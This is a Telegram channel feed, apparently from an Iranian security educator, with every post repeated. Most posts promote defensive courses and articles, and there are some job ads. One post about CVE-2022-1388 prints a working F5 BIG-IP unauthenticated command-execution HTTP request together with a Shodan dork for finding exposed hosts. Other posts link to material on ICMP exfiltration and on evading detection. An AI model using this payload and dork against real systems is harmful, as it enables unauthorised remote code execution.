Channel: AmirHoseinTangsiriNET
🔺دوره آموزشی رایگان Sysmon
🔹توی این دوره قصد دارم از پایه مبحث Sysmon رو براتون شرح بدم و باهم ببریم جلو... این دوره کاملا رایگانه و خب به زبان انگلیسیم هست ولی دوره که تکمیل شد احتمالش هست که به صورت فارسی هم براتون بزارم اما فعلا انگلیسی هست...
دوره هنوز تکمیل نشده و صرفا سه قسمت ازش تکمیل شده به مرور هر چند قسمت که تکمیل بشه رو براتون اینجا قرار میدم
• Part 1: What Is Threat Hunting? (https://smenode.com/sysmon-101-what-is-threat-hunting/)
• Part 2: What Is Sysmon? And How To Install Sysmon (https://smenode.com/sysmon-101-what-is-sysmon-and-how-to-install-sysmon/)
• Part 3: Sysmon Events ID For Threat Hunting (https://smenode.com/sysmon-101-sysmon-events-id-for-threat-hunting/)
📌 Sysmon
@AmirHoseinTangsiriNET〽️
🔹توی این دوره قصد دارم از پایه مبحث Sysmon رو براتون شرح بدم و باهم ببریم جلو... این دوره کاملا رایگانه و خب به زبان انگلیسیم هست ولی دوره که تکمیل شد احتمالش هست که به صورت فارسی هم براتون بزارم اما فعلا انگلیسی هست...
دوره هنوز تکمیل نشده و صرفا سه قسمت ازش تکمیل شده به مرور هر چند قسمت که تکمیل بشه رو براتون اینجا قرار میدم
• Part 1: What Is Threat Hunting? (https://smenode.com/sysmon-101-what-is-threat-hunting/)
• Part 2: What Is Sysmon? And How To Install Sysmon (https://smenode.com/sysmon-101-what-is-sysmon-and-how-to-install-sysmon/)
• Part 3: Sysmon Events ID For Threat Hunting (https://smenode.com/sysmon-101-sysmon-events-id-for-threat-hunting/)
📌 Sysmon
@AmirHoseinTangsiriNET〽️
🔹دوره آموزشی MTA با عنوان Malware Traffic Analysis در Tosinso.com (کاملا رایگان) مخصوص افرادی که قصد دارند از پایه تا پیشرفته مباحث تحلیل ترافیک های بدافزارها و ترافیک های مشکوک را قرارگیرند.
👤مدرس: امیرحسین تنگسیری نژاد
🔹این دوره درقالب 30 جلسه آموزش تکمیلی و تئوری مباحثی که مربوط به شناسایی ترافیک های مخرب و ترافیک های بدافزارها و شیوع آنها در شبکه را پوشش داده است و به عنوان یک مکمل برای دوره SANS SEC503 نیز شناخته میشود.
〽️نکته: این دوره کاملا تدریس شده است اما به دلایل تاخیر در تدوین ویدیوها کاملا آپلود نشده اند و هر روز یا یک روز در میون ویدیوهای جدید بارگذاری میشود.
💯به منظور دیدن سرفصل ها و دریافت دوره به لینک زیر مراجعه کنید
📌https://bit.ly/3MqspL9
@AmirHoseinTangsiriNET〽️
👤مدرس: امیرحسین تنگسیری نژاد
🔹این دوره درقالب 30 جلسه آموزش تکمیلی و تئوری مباحثی که مربوط به شناسایی ترافیک های مخرب و ترافیک های بدافزارها و شیوع آنها در شبکه را پوشش داده است و به عنوان یک مکمل برای دوره SANS SEC503 نیز شناخته میشود.
〽️نکته: این دوره کاملا تدریس شده است اما به دلایل تاخیر در تدوین ویدیوها کاملا آپلود نشده اند و هر روز یا یک روز در میون ویدیوهای جدید بارگذاری میشود.
💯به منظور دیدن سرفصل ها و دریافت دوره به لینک زیر مراجعه کنید
📌https://bit.ly/3MqspL9
@AmirHoseinTangsiriNET〽️
🔺️MITRE ATT&CK Version 11.0 Release (25 April 2022)
MITRE ATT&CK v11
🔹️https://lnkd.in/gSzMfU-B
MITRE ATT&CK April Update
🔹️https://lnkd.in/g5Ayj39g
📌MITRE ATT&CK
@AmirHoseinTangsiriNET〽️
MITRE ATT&CK v11
🔹️https://lnkd.in/gSzMfU-B
MITRE ATT&CK April Update
🔹️https://lnkd.in/g5Ayj39g
📌MITRE ATT&CK
@AmirHoseinTangsiriNET〽️
🔹معرفی و بررسی تکنیک PreOS Boot از تکنیکهای Persistence ثبت شده در MITRE ATT&CK با شناسه T1542
https://security.tosinso.com/fa/articles/44552/
📌 Persistence
@AmirHoseinTangsiriNET〽️
https://security.tosinso.com/fa/articles/44552/
📌 Persistence
@AmirHoseinTangsiriNET〽️
🔺️BIG-IP iControl REST vulnerability CVE-2022-1388
🔹️This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.
🔹️Details: https://lnkd.in/emtA8JCk
🔹️CVE-2022-1388 Cheacker (https://lnkd.in/eUh4NHtN)
🔹️CVE-2022-1388 Exploit (https://lnkd.in/eCEp8_b3)
🔹️Request:
POST /mgmt/tm/util/bash HTTP/1.1
Host: REDACTED:8083
Content-Length: 45
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: vvs
Authorization: Basic YWRtaW46
{
"command":"run",
"utilCmdArgs":"-c id"
}
🔹️Shodan Dork:
http.title:"BIG-IP®-+Redirect" +"Server"
📌 F5
@AmirHoseinTangsiriNET〽️
🔹️This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.
🔹️Details: https://lnkd.in/emtA8JCk
🔹️CVE-2022-1388 Cheacker (https://lnkd.in/eUh4NHtN)
🔹️CVE-2022-1388 Exploit (https://lnkd.in/eCEp8_b3)
🔹️Request:
POST /mgmt/tm/util/bash HTTP/1.1
Host: REDACTED:8083
Content-Length: 45
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: vvs
Authorization: Basic YWRtaW46
{
"command":"run",
"utilCmdArgs":"-c id"
}
🔹️Shodan Dork:
http.title:"BIG-IP®-+Redirect" +"Server"
📌 F5
@AmirHoseinTangsiriNET〽️
🔺F5 CVE-2022-1388 Vulnerability Scanner
🔹️GitHub: https://github.com/AmirHoseinTangsiriNET/CVE-2022-1388-Scanner
📌 F5
@AmirHoseinTangsiriNET〽️
🔹️GitHub: https://github.com/AmirHoseinTangsiriNET/CVE-2022-1388-Scanner
📌 F5
@AmirHoseinTangsiriNET〽️
🔹معرفی 15 ابزار پرکاربرد در تیم های آبی (BlueTeams)
https://security.tosinso.com/fa/articles/44563
📌 Blue Team
@AmirHoseinTangsiriNET〽️
https://security.tosinso.com/fa/articles/44563
📌 Blue Team
@AmirHoseinTangsiriNET〽️
🔺Kali Linux 2022.2 released
New Tools
🔹BruteShark – A network forensic analysis tool
🔹Evil-WinRM – A Windows Remote Management (WinRM) shell
🔹Hakrawler – A web crawler for easy and quick discovery of endpoints and assets
🔹Httpx – A multi-purpose HTTP toolkit
🔹LAPSDumper – A toold for dumping LAPS passwords
🔹PhpSploit – A stealthy post-exploitation framework
🔹PEDump – A tool for dumping Win32 executable files
🔹SentryPeer – A SIP peer-to-peer honeypot for VoIP
🔹Sparrow-wifi – A graphical Wi-Fi Analyzer for Linux
🔹wifipumpkin3 – A powerful framework for rogue access points attacks
• Download (https://www.kali.org/get-kali)
• Upgrade (https://www.kali.org/docs/general-use/updating-kali/)
📌 News / Kali Linux
@AmirHoseinTangsiriNET〽️
New Tools
🔹BruteShark – A network forensic analysis tool
🔹Evil-WinRM – A Windows Remote Management (WinRM) shell
🔹Hakrawler – A web crawler for easy and quick discovery of endpoints and assets
🔹Httpx – A multi-purpose HTTP toolkit
🔹LAPSDumper – A toold for dumping LAPS passwords
🔹PhpSploit – A stealthy post-exploitation framework
🔹PEDump – A tool for dumping Win32 executable files
🔹SentryPeer – A SIP peer-to-peer honeypot for VoIP
🔹Sparrow-wifi – A graphical Wi-Fi Analyzer for Linux
🔹wifipumpkin3 – A powerful framework for rogue access points attacks
• Download (https://www.kali.org/get-kali)
• Upgrade (https://www.kali.org/docs/general-use/updating-kali/)
📌 News / Kali Linux
@AmirHoseinTangsiriNET〽️
🔺️OpenEDR ( Free Epoint Detection And Response )
🔹️OpenEDR is a free platform which allows you to analyze what's happening across your entire environment at base-security-event level. The agent records all telemetry information locally and will send the data to locally hosted or cloud hosted ElasticSeach deployments.
🔹️Endpoint detection and response (EDR), also known as endpoint threat detection and response (ETDR), is an integrated endpoint security solution that combines real-time continuous monitoring and collection of endpoint data with rules-based automated response and analysis capabilities.
• Website: https://openedr.com/
• Github: https://lnkd.in/evsCzTyy
• Release: https://lnkd.in/ehxqtZED
📌 EDR
@AmirHoseinTangsiriNET〽️
🔹️OpenEDR is a free platform which allows you to analyze what's happening across your entire environment at base-security-event level. The agent records all telemetry information locally and will send the data to locally hosted or cloud hosted ElasticSeach deployments.
🔹️Endpoint detection and response (EDR), also known as endpoint threat detection and response (ETDR), is an integrated endpoint security solution that combines real-time continuous monitoring and collection of endpoint data with rules-based automated response and analysis capabilities.
• Website: https://openedr.com/
• Github: https://lnkd.in/evsCzTyy
• Release: https://lnkd.in/ehxqtZED
📌 EDR
@AmirHoseinTangsiriNET〽️
🔹مفهوم Adversary Emulation در امنیت سایبری چیست؟ شبیه سازی دشمن + معرفی ابزارهای پیاده سازی Adversary Emulation
https://security.tosinso.com/fa/articles/44567/
📌 Adversary Emulation
@AmirHoseinTangsiriNET〽️
https://security.tosinso.com/fa/articles/44567/
📌 Adversary Emulation
@AmirHoseinTangsiriNET〽️
🔹بدافزار بدون فایل ( Fileless Malware ) چیست؟
https://security.tosinso.com/fa/articles/44597/
📌 Fileless Malware
@AmirHoseinTangsiriNET〽️
https://security.tosinso.com/fa/articles/44597/
📌 Fileless Malware
@AmirHoseinTangsiriNET〽️
سلام خدمت عزیزان... دنبال یک نیرو مسلط به تجهیزات F5 ( LTM & ASM ) و Cisco Nexus هستیم توی یه محیط دیتاسنتری به صورت تمام وقت
حقوق براساس توانایی فرد بین 10 تا 15 تومن
عزیزانی که علاقمند هستند لطفا رزومشونو برام یا ایمیل کنند یا به ایدی خودم بفرستند.
[email protected]
@AramesH_AmirHosein
حقوق براساس توانایی فرد بین 10 تا 15 تومن
عزیزانی که علاقمند هستند لطفا رزومشونو برام یا ایمیل کنند یا به ایدی خودم بفرستند.
[email protected]
@AramesH_AmirHosein
🔹قوانین Sigma چیست؟ راهنما نوشتن قوانین Sigma
https://security.tosinso.com/fa/articles/44599/
📌 Sigma Rule
@AmirHoseinTangsiriNET〽️
https://security.tosinso.com/fa/articles/44599/
📌 Sigma Rule
@AmirHoseinTangsiriNET〽️
🔹معرفی 13 ابزار تحلیل و شناسایی بدافزار (Malware Analysis)
https://security.tosinso.com/fa/articles/44603/
📌 Malware Analysis
@AmirHoseinTangsiriNET〽️
https://security.tosinso.com/fa/articles/44603/
📌 Malware Analysis
@AmirHoseinTangsiriNET〽️
🔹7 نکته برای امن سازی پروتکل SSH
https://security.tosinso.com/fa/articles/44604/
📌 SSH
@AmirHoseinTangsiriNET〽️
https://security.tosinso.com/fa/articles/44604/
📌 SSH
@AmirHoseinTangsiriNET〽️
🔹یک مخزن بسیار مناسب برای سوالات مربوط به استخدامی در حوزه SOC ارائه شده توسط بستر LetsDefend
بخشی از این سوالات توسط بنده نوشته شده است که توی استخدامی ها و مصاحبه های داخل کشور هم بسیار پرسیده میشوند.
حتما این سوالات رو در نظر داشته باشید موارد زیادی ازشون میتونه توی استخدامی ها پرسیده بشه
https://github.com/LetsDefend/SOC-Interview-Questions
📌 SOC Analyst Interview Questions
@AmirHoseinTangsiriNET〽️
بخشی از این سوالات توسط بنده نوشته شده است که توی استخدامی ها و مصاحبه های داخل کشور هم بسیار پرسیده میشوند.
حتما این سوالات رو در نظر داشته باشید موارد زیادی ازشون میتونه توی استخدامی ها پرسیده بشه
https://github.com/LetsDefend/SOC-Interview-Questions
📌 SOC Analyst Interview Questions
@AmirHoseinTangsiriNET〽️
GitHub
GitHub - LetsDefend/SOC-Interview-Questions: SOC Interview Questions
SOC Interview Questions. Contribute to LetsDefend/SOC-Interview-Questions development by creating an account on GitHub.
🔹معرفی تکنیک Parent-Child Process در تجهیزات امنیتی و نحوه دور زدن آن
https://security.tosinso.com/fa/articles/44647/
📌 Parent-Child Process
@AmirHoseinTangsiriNET〽️
https://security.tosinso.com/fa/articles/44647/
📌 Parent-Child Process
@AmirHoseinTangsiriNET〽️
🔹حمله فیشینگ ( Phishing ) از طریق فایل ICS
https://security.tosinso.com/fa/articles/44646/
📌 Phishing With ICS File
@AmirHoseinTangsiriNET〽️
https://security.tosinso.com/fa/articles/44646/
📌 Phishing With ICS File
@AmirHoseinTangsiriNET〽️
با سلام
در شرکت Sadad Electronic Payment/ پرداخت الکترونیک سداد ( بانک ملی ) به دنبال افرادی توانمند در حوزه مرکز عمليات امنیت ترجیحا کارشناس سطح 2 میباشیم
توانمندی های مورد نیاز:
شناسایی تهدیدات و پاسخگویی به حوادث
رسیدگی به Ticket های ساخته شده
توانایی حل مشکل و R&D
عزیزانی که مایل هستند گپو گفتی داشته باشیم رزومهشون رو برای من دایرکت ارسال کنند
سوالی هم داشتید میتونید بپرسید.
@AramesH_AmirHosein
در شرکت Sadad Electronic Payment/ پرداخت الکترونیک سداد ( بانک ملی ) به دنبال افرادی توانمند در حوزه مرکز عمليات امنیت ترجیحا کارشناس سطح 2 میباشیم
توانمندی های مورد نیاز:
شناسایی تهدیدات و پاسخگویی به حوادث
رسیدگی به Ticket های ساخته شده
توانایی حل مشکل و R&D
عزیزانی که مایل هستند گپو گفتی داشته باشیم رزومهشون رو برای من دایرکت ارسال کنند
سوالی هم داشتید میتونید بپرسید.
@AramesH_AmirHosein
🔺️Data Exfiltration Using ICMP Protocol
🔹️ICMP Exfiltration Allow You To Transient Data Into ICMP Packet To A Remote Host (C2 Server)
• Tutorial: https://lnkd.in/dsFh7yJc
📌 ICMP Exfiltration
@AmirHoseinTangsiriNET〽️
🔹️ICMP Exfiltration Allow You To Transient Data Into ICMP Packet To A Remote Host (C2 Server)
• Tutorial: https://lnkd.in/dsFh7yJc
📌 ICMP Exfiltration
@AmirHoseinTangsiriNET〽️
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
HTML Embed Code: